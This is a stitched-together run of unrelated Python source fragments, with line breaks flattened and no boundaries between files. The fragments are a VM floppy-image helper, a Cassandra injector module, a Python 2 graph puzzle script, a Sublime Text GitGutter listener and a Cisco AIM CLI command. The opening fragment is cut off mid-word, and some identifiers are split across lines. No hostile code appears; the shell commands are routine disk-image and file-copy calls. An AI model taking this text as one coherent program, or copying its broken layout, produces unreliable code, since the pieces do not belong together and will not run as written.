vfd_size clean_old_image(path) try: c_cmd = '%s create -f raw %s %s' % (qemu_img_binary, path, self.vfd_size) process.run(c_cmd, verbose=DEBUG) f_cmd = 'mkfs.msdos -s 1 %s' % path process.run(f_cmd, verbose=DEBUG) except process.CmdError as e: logging.error("Error during floppy initialization: %s" % e) cleanup(self.mount) raise def close(self): """ Copy everything that is in the mountpoint to the floppy. """ pwd = os.getcwd() try: os.chdir(self.mount) path_list = glob.glob('*') for path in path_list: self.copy_to(path) finally: os.chdir(pwd) cleanup(self.mount) def copy_to(self, src): logging.debug("Copying %s to floppy image", src) mcopy_cmd = "mcopy -s -o -n -i %s %s ::/" % (self.path, src) process.run(mcopy_cmd, verbose=DEBUG) def _copy_virtio_drivers(self, virtio_floppy): """ Copy the virtio drivers on the virtio floppy to the install floppy. 1) Mount the floppy containing the viostor drivers 2) Copy its contents to the root of the install floppy """ pwd = os.getcwd() try: m_cmd = 'mcopy -s -o -n -i %s ::/* %s' % ( virtio_floppy, self.mount) process.run(m_cmd, verbose=DEBUG) finally: os.chdir(pwd) def setup_virtio_win2003(self, virtio_floppy, virtio_oemsetup_id): """ Setup the install floppy with the virtio storage drivers, win2003 style. Win2003 and WinXP depend on the file txtsetup.oem file to install the virtio drivers from the floppy, which is a .ini file. Process: 1) Copy the virtio drivers on the virtio floppy to the install floppy 2) Parse the ini file with config parser 3) Modify the identifier of the default session that is going to be executed on the config parser object 4) Re-write the config file to the disk """ self._copy_virtio_drivers(virtio_floppy) txtsetup_oem = os.path.join(self.mount, 'txtsetup.oem') if not os.path.isfile(txtsetup_oem): raise IOError('File txtsetup.oem not found on the install ' 'floppy. Please verify if your floppy virtio ' 'driver image has this file') parser = ConfigParser.ConfigParser() parser.read(txtsetup_oem) if not parser.has_section('Defaults'): raise ValueError('File txtsetup.oem does not have the session ' '"Defaults". Please check txtsetup.oem') default_driver = parser.get('Defaults', 'SCSI') if default_driver != virtio_oemsetup_id: parser.set('Defaults', 'SCSI', virtio_oemsetup_id) fp = open(txtsetup_oem, 'w') parser.write(fp) fp.close() def setup_virtio_win2008(self, virtio_floppy): """ Setup the install floppy with the virtio storage drivers, win2008 style. Win2008, Vista and 7 require people to point out the path to the drivers on the unattended file, so we just need to copy the drivers to the driver floppy disk. Importan
from injector import Module from cassandra.cqlengine import connection from cassandra.cluster import Cluster from cassandra.cqlengine.management import create_keyspace_simple, sync_table, sync_type from cassandra.cqlengine.usertype import UserType from ...entities.track_type import TrackType from cassandra_users_repository import CassandraUsersRepository from cassandra_spots_repository import CassandraSpotsRepository from runs.cassandra_runs_repository import CassandraRunsRepository from cassandra_checkpoint_passes_repository import CassandraCheckpointPassesRepository from ..repositories_definitions import UsersRepository from ..repositories_definitions import SpotsRepository from ..repositories_definitions import RunsRepository from ..repositories_definitions import CheckpointPassesRepository class CassandraRepositoriesModule(Module): def configure(self, binder): connection.setup(['cassandrahost'], 'biketimer', protocol_version=4) cluster = Cluster(['cassandrahost']) session = cluster.connect('biketimer') users_repository_instance = CassandraUsersRepository(cluster, session) binder.bind(UsersReposito
ry, to=users_repository_instance)
spots_repository_instance = CassandraSpotsRepository(cluster, session) binder.bind(SpotsRepository, to=spots_repository_instance) runs_repository_instance = CassandraRunsRepository(cluster, session) binder.bind(RunsRepository, to=runs_repository_instance) checkpoint_passes_repository_instance = CassandraCheckpointPassesRepository(cluster, session) binder.bind(CheckpointPassesRepository, to=checkpoint_passes_repository_instance)
import sys, math # **************** Main program ********************************************* def main(): # File IO ############################################### txt = open("in9.txt", 'r') N = int (txt.readline()) n = 2 * N a = [[0 for x in range(1)] for y in range(n)] # print >> sys.stderr, a print >> sys.stderr, "N=", N for line in range (0, N): x , y = [int(j) for j in txt.readline().split()] #print >> sys.stderr, '%d %d' % (x, y) m, n = sortTwo(x, y) a[m].append(n) a[n].append(m) a[m][0] += 1 a[n][0] += 1 print >> sys.stderr, "Done file IO \n \n" ############################################################## # Init vars------------------------------------------------- #print >> sys.stderr, a while (a[-1]==[0]): # check for abundant [0] a.pop() relationship = a n = len(relationship) print >> sys.stderr, "total nodes:" , n level = [0] * n # contains level of nodes # print >> sys.stderr, level #print >> sys.stderr, "relationship: \n" , relationship countOne = 0 oneList = [] for elem in range(0, n): if (relationship[elem][0] == 1): countOne += 1 oneList.a
ppend(elem) print >> sys.stderr, "countONe:", countOne # print >> sys.stderr,"oneList:", oneList print >> sys.stderr, "Done Var init \n \n" # ------------------------------------------------------------- # Engine --------------------------------------------------- for i in range(0, countOne):
node = oneList[i] level[i] = findSingleMaxLength(node, node, oneList, countOne, relationship, n) # ------------------------------------------------------------ # Report ------------------------------------------------- #--------------------------------------------------------- # No touch area ------------------------------------------ maxi = max(level) if (maxi % 2 == 0): ans = maxi / 2 else: ans = (maxi + 1) / 2 print >> sys.stderr, "Answer:", ans #*********************** End program ************************************************ def spreadRumorNode(node, relationship, relationship_len): # update relationship and provide bag bag = [] new_relationship = relationship if (new_relationship[node][0] > 0): for bag_elem in range (1, 1 + relationship[node][0]): node_child = relationship[node][bag_elem] if (relationship[node_child][0] > 0): bag.append(node_child) new_relationship[node][0] = -2 return bag, new_relationship def spreadRumorOnce(target_list, relationship, relationship_len): new_target_list = [] new_relationship = relationship number_of_target = len(target_list) target_bag = [[] for y in range(number_of_target)] for i in range(number_of_target): node = target_list[i] target_bag[i], new_relationship = spreadRumorNode(node, new_relationship, relationship_len) new_target_list.extend(target_bag[i]) return new_target_list, new_relationship def findSingleMaxLength(x, x_pos, oneList, oneList_len, relationship, relationship_len): new_relationship = relationship step = -1 try: i = oneList.index(x) except ValueError: return -1 # no match nowhere_to_go = 0 target_list = [x] while (nowhere_to_go == 0): step += 1 target_list, new_relationship = spreadRumorOnce(target_list, new_relationship, relationship_len) if (target_list == []): nowhere_to_go = 1 return step def findMin(a, b): res = a if (res > b): res = b return res def sortTwo(a, b): if (a < b): x = a y = b else: x = b y = a return x, y main()
import time import sublime import sublime_plugin ST3 = int(sublime.version()) >= 3000 if ST3: from .view_collection im
port ViewCollection from .git_gutter_popup import show_diff_popup else: from view_collection import ViewCollection from git_gutter_popup import show_diff_popup def async_event_listener(EventListe
ner): if ST3: async_methods = set([ 'on_new', 'on_clone', 'on_load', 'on_pre_save', 'on_post_save', 'on_modified', 'on_selection_modified', 'on_activated', 'on_deactivated', ]) for attr_name in dir(EventListener): if attr_name in async_methods: attr = getattr(EventListener, attr_name) setattr(EventListener, attr_name + '_async', attr) delattr(EventListener, attr_name) return EventListener @async_event_listener class GitGutterEvents(sublime_plugin.EventListener): def __init__(self): self._settings_loaded = False self.latest_keypresses = {} # Synchronous def on_modified(self, view): if self.settings_loaded() and self.live_mode: self.debounce(view, 'modified', ViewCollection.add) def on_clone(self, view): if self.settings_loaded(): self.debounce(view, 'clone', ViewCollection.add) def on_post_save(self, view): if self.settings_loaded(): self.debounce(view, 'post-save', ViewCollection.add) def on_load(self, view): if self.settings_loaded() and self.live_mode: self.debounce(view, 'load', ViewCollection.add) def on_activated(self, view): if self.settings_loaded() and self.focus_change_mode: self.debounce(view, 'activated', ViewCollection.add) def on_hover(self, view, point, hover_zone): if hover_zone != sublime.HOVER_GUTTER: return # don't let the popup flicker / fight with other packages if view.is_popup_visible(): return if not settings.get("enable_hover_diff_popup"): return show_diff_popup(view, point, flags=sublime.HIDE_ON_MOUSE_MOVE_AWAY) # Asynchronous def debounce(self, view, event_type, func): if self.non_blocking: key = (event_type, view.file_name()) this_keypress = time.time() self.latest_keypresses[key] = this_keypress def callback(): latest_keypress = self.latest_keypresses.get(key, None) if this_keypress == latest_keypress: func(view) if ST3: set_timeout = sublime.set_timeout_async else: set_timeout = sublime.set_timeout set_timeout(callback, settings.get("debounce_delay")) else: func(view) # Settings def settings_loaded(self): if settings and not self._settings_loaded: self._settings_loaded = self.load_settings() return self._settings_loaded def load_settings(self): self.live_mode = settings.get('live_mode') if self.live_mode is None: self.live_mode = True self.focus_change_mode = settings.get('focus_change_mode') if self.focus_change_mode is None: self.focus_change_mode = True self.non_blocking = settings.get('non_blocking') if self.non_blocking is None: self.non_blocking = True return True settings = {} def plugin_loaded(): global settings settings = sublime.load_settings('GitGutter.sublime-settings') if not ST3: plugin_loaded()
# Copyright (c) 2016 Cisco Systems # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import click from aim import config as aim_cfg from aim import context from aim.db import api from aim.tools.cli.groups import aimcli @aimcli.aim.group(name='config') @click.pass_context def config(ctx): aim_ctx = context.AimContext(store=api.get_store(expire_on_commit=True)) ctx
.obj['manager'] = aim_cfg.ConfigManager(aim_ctx, '') @config.comm
and(name='update') @click.argument('host', required=False) @click.pass_context def update(ctx, host): """Current database version.""" host = host or '' ctx.obj['manager'].to_db(ctx.obj['conf'], host=host) @config.command(name='replace') @click.argument('host', required=False) @click.pass_context def replace(ctx, host): """Used for upgrading database.""" host = host or '' ctx.obj['manager'].replace_all(ctx.obj['conf'], host=host)